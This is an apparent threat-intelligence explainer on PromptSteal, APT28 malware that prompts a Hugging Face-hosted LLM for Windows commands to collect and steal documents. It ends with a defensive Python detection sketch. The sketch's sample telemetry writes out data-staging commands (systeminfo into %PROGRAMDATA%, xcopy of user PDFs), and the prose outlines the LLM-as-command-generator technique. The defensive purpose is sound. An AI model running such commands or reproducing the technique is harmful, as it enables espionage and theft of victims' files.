PromptSteal (also written PROMPTSTEAL, and tracked by Ukraine's CERT-UA as LAMEHUG) is a sophisticated, AI-integrated data-mining malware first observed in live operations in June 2025. It represents a landmark case: the first documented instance of malware actively querying a large language model (LLM) during execution in real-world cyberattacks, according to Google Threat Intelligence Group (GTIG). Unlike traditional stealers with fixed, hard-coded commands, PromptSteal dynamically generates its malicious actions by prompting an external LLM, making it more flexible, adaptive, and potentially harder to detect with signatures.
As of March 2026, PromptSteal remains one of the clearest examples of AI moving from attacker productivity aid to runtime component in live espionage. It underscores the need for behavioral analytics, network controls on AI service domains, script execution restrictions, and rapid patching of initial access vectors (often spear-phishing in APT28 campaigns). While not yet widespread among cybercriminals, its success in state hands foreshadows broader adoption in more autonomous, prompt-driven attack frameworks.
This malware was deployed by the Russian government-backed actor APT28 (also known as FROZENLAKE, Fancy Bear, or Sednit), a GRU-linked group notorious for espionage operations. It targeted Ukrainian entities in geopolitically motivated campaigns, marking a shift from experimental AI misuse to operational deployment.
Core Characteristics and Functionality
- Programming Language — Written in Python and typically packaged as a standalone executable using PyInstaller for easier distribution and execution on Windows systems without requiring a Python interpreter.
- Type — Information stealer / data miner focused on reconnaissance and exfiltration of system details and documents.
- Primary Goal — Collect sensitive environmental data (hardware, processes, network, services, Active Directory info) and stage user files (especially Office documents and PDFs) for theft, while evading traditional detection by avoiding static command strings.
- Operational Status — Observed in live operations (unlike more experimental siblings like PromptFlux). Samples showed ongoing development, including added obfuscation layers and evolving command-and-control (C2) mechanisms in later variants.
How PromptSteal Works: LLM as a Remote Command Generator
The malware’s core innovation is treating an LLM as an on-demand “command compiler”:
- Masquerade & Initial Execution — It disguises itself as a benign “image generation” program. When run, it presents a fake interactive prompt interface to the user (e.g., asking for image descriptions), creating the illusion of legitimate activity while operating silently in the background.
- API Integration — It connects to the Hugging Face Inference API (a public platform hosting open-source models) to query the specific LLM Qwen2.5-Coder-32B-Instruct (a code-focused model from Alibaba’s Qwen family). It likely uses stolen or embedded API tokens for access.
- Prompt Engineering — Carefully crafted, natural-language prompts are sent to the model. These prompts instruct the LLM to output single-line Windows commands (cmd.exe or PowerShell compatible) for specific malicious tasks. Examples include:
  - Gathering comprehensive system information (e.g., systeminfo, wmic, netstat, process lists, etc.) and saving it to a file like %PROGRAMDATA%\info\info.txt.
  - Creating staging directories.
  - Recursively searching and copying targeted file types (e.g., .docx, .pdf, .xlsx) from user folders such as Documents, Desktop, and Downloads into the staging area.

  Prompts are highly specific and designed to produce clean, executable one-liners that the malware can run blindly.
- Command Execution — The malware parses the LLM’s response (expecting only the command itself, with no extra text) and executes it locally via subprocess calls or similar mechanisms.
- Exfiltration — Collected data (info.txt + staged files) is packaged and sent to attacker-controlled infrastructure, typically via HTTP POST, SFTP, or other methods. C2 channels evolved in newer samples.
- Evasion & Flexibility — By generating commands dynamically at runtime, the malware avoids hard-coded strings that antivirus or EDR tools might flag. New reconnaissance or theft logic can be introduced simply by changing the prompt logic in updates—no recompilation of large payloads required.
This “just-in-time” command generation allows APT28 to adapt behaviors without redeploying entirely new binaries, reducing development overhead and complicating static analysis.
Attribution and Context
- Threat Actor — Strongly attributed to APT28 (FROZENLAKE) by GTIG, with medium-confidence corroboration from CERT-UA. The group has a long history of targeting Ukraine with espionage-focused tools.
- Discovery Timeline — First identified in June 2025 in attacks on Ukrainian government and related entities. Publicly detailed by CERT-UA (as LAMEHUG) and later included in Google’s November 2025 GTIG AI Threat Tracker report.
- Broader Family — Part of an early wave of LLM-integrated malware identified in 2025, alongside PROMPTFLUX (self-rewriting dropper), QUIETVAULT (credential stealer), FRUITSHELL, and PROMPTLOCK.
Implications for Cybersecurity
PromptSteal highlights how accessible public LLMs (especially open-source ones on Hugging Face) enable state actors to build adaptive tooling with minimal custom code. Key challenges for defenders include:
- Lack of static signatures — Commands are generated fresh each run.
- Outbound traffic to AI APIs — Unusual connections to huggingface.co endpoints (especially inference APIs) can be an indicator.
- Behavioral detection needs — Focus on monitoring for blind execution of dynamically created commands, unusual file staging in %PROGRAMDATA%, mass document copying, and exfil patterns.
- API Abuse Monitoring — Organizations and platforms can watch for anomalous prompt patterns resembling reconnaissance or theft instructions.
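The behavioral signals listed above can be combined into one correlation rule: a process contacts a huggingface.co endpoint and shortly afterwards spawns a shell whose command line stages data in %PROGRAMDATA% or collects documents. The sketch below is an added example, not code from GTIG, CERT-UA or the original page; the event schema, field names, sample events and 120-second window are assumptions made for illustration.

```python
import re

AI_HOST = re.compile(r"(^|\.)huggingface\.co$", re.I)   # domain named on this page
SHELLS = {"cmd.exe", "powershell.exe"}
STAGING = re.compile(r"%programdata%|\\programdata\\", re.I)
DOCS = re.compile(r"\.(docx?|xlsx?|pdf)\b", re.I)

# Constructed telemetry, not from a real incident. "t" is seconds since start.
EVENTS = [
    {"t": 10, "type": "net", "pid": 4120, "dest": "huggingface.co"},
    {"t": 14, "type": "proc", "ppid": 4120, "image": "cmd.exe",
     "cmd": r"cmd.exe /c systeminfo >> %PROGRAMDATA%\info\info.txt"},
    {"t": 25, "type": "proc", "ppid": 4120, "image": "cmd.exe",
     "cmd": r'cmd.exe /c xcopy "%USERPROFILE%\Documents\*.pdf" "%PROGRAMDATA%\info" /s'},
    # Developer tool: talks to the same host, but its shell stages nothing.
    {"t": 30, "type": "net", "pid": 7300, "dest": "huggingface.co"},
    {"t": 33, "type": "proc", "ppid": 7300, "image": "cmd.exe", "cmd": "cmd.exe /c pip list"},
    # Backup job: copies documents, but never contacted an AI host.
    {"t": 40, "type": "proc", "ppid": 8800, "image": "cmd.exe",
     "cmd": r'cmd.exe /c xcopy "D:\share\*.docx" "E:\backup" /s'},
    # AI contact long before the shell: outside the correlation window.
    {"t": 50, "type": "net", "pid": 9100, "dest": "huggingface.co"},
    {"t": 900, "type": "proc", "ppid": 9100, "image": "powershell.exe",
     "cmd": r"powershell.exe -c Get-Process > C:\ProgramData\p.txt"},
]

def detect(events, window=120):
    """Return {parent pid: reasons} for processes that contact an AI API host
    and, within `window` seconds, spawn a shell that stages or collects data."""
    last_ai = {}   # pid -> time of its most recent AI-host connection
    alerts = {}
    for e in sorted(events, key=lambda e: e["t"]):
        if e["type"] == "net" and AI_HOST.search(e["dest"]):
            last_ai[e["pid"]] = e["t"]
        elif e["type"] == "proc" and e["image"].lower() in SHELLS:
            seen = last_ai.get(e["ppid"])
            if seen is None or e["t"] - seen > window:
                continue   # no recent AI contact by the parent: not this pattern
            reasons = set()
            if STAGING.search(e["cmd"]):
                reasons.add("programdata_staging")
            if DOCS.search(e["cmd"]):
                reasons.add("document_collection")
            if reasons:
                alerts.setdefault(e["ppid"], set()).update(reasons)
    return {pid: sorted(r) for pid, r in alerts.items()}

if __name__ == "__main__":
    print(detect(EVENTS))
```

Requiring both the AI-host contact and the staging behavior keeps ordinary developer use of Hugging Face and routine backup jobs from alerting on their own.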
